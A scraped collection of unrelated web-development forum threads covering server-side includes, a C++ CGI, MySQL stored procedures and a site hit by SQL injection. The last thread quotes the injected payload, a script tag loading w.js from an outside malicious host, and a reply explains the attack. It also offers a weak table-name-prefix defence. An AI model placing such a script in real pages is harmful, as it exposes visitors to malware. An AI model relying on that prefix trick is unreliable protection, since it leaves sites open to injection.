i wanna creat a link which open exe file without prompting for save.
abviously that shouldn`t be done with ActiveX because Mozilla, Opera, Safari,... don`t support!
couldn`t Action Script Help?!

hello,
I want to include one page as a header for all my web pages.For which I have written the following code

The above code works fine with the page seen in the Preview in Browser but fails in the Internet Explorer browser.

The browser has nothing to do with the file being included or not, I think you have to leave a space between

Thanks for your answers.
But with the space it doesn't work.I can see the include file in the preview but cannot see it in Internet Explorer. How can I make sure server side includes are enabled?

I am using Dreamweaver to make the web page and I can see the included file when checked in the 'Preview in Browser'.but when I open the page in Internet Explorer I cannot see the include page.
I don't know about the web server.

Hi Prithaa,
I don't use Dreamweaver very often so I don't know much about its features, it seems that it automatically includes the file for you in the page preview. I'll try to make this as simple as possible, basically you need to run your website on a web server in order to be able to include files, if you plan to have your website hosted on a shared web host then you shouldn't worry about this, it will be taken care of by the web server of the shared host. I don't know what operating system you are using but I will assume it's either Windows XP or Windows Vista, in either Windows XP or Visa you have a web server called IIS, you have to run your website on IIS in order to be able to view it in Internet Explorer.

Hi Everyone,
I am having problems running a C++ CGI in my browser.
I compile with Visual C++ (although I have also tried Borland 5.5).
Then I rename the .exe file as .cgi and upload to the cgi-bin.
The .cgi file gives an error and the .exe file runs - but not in the browser.
It asks if I want to save or run.
Then it opens a DOS window and displays the result of the program in there.
Any idea why this won't run and display results in the browser?

Hi.. buddies
I am using MSVS 2008 and Mysql server 5.0.
I want to fetch records in my webform through stored procedure stored in mysql database.
But when i execute the code i m getting following error msg;
"ERROR [42000] [MySQL][ODBC 3.51 Driver][mysqld-5.0.45-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Exec Area_Of_Rec_M_SelectAll()'"
Could you tell me the right code to handle the problem.

I got the resolution.
it's "Call Stored_proc_Name"
This should be your command object's CommandText property.

Or you can set .CommandType to ystem.Data.CommandType.StoredProcedure and set .CommandText to the name of the stored procedure. I think this is supposed to run slightly faster as the server doesn't have to parse out the "CALL" command.

Hello to all,
i have a web application in asp with sql server2000. it was running fine untill a script attack.This script " "></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!-- " can be find in almost all tables in my database table. i have protection for sql injection (for apostrophy(')). Can anybody tell me how this script affect and how it append itself in my database table.

You have been the victim of a SQL Injection attack, I'm afraid. Someone has inserted this code into your tables, so that when you display database content on your webpage this script will appear re-directing users (or maybe just an image url) to a malicious website (in China, by the look of the url) where they will try to infect the users computer. While escaping apostrophe's is a start in foiling such attacks, it is by no means the end of the matter. There are articles on this site and elsewhere with advice on how to code your applications to protect yourself better.
One simple "trick" I use is to prefix all my database tables with a character string no genuine user will ever need to use - eg "aqhk" - then remove any occurences of that string from all SQL statements or other data input. So if someone tries to "update aqhkLogins set..." for example, it will fail because I will have re-written the statement to "update Logins set..." - unknown table!
btw, this should really be in the SQL forum....
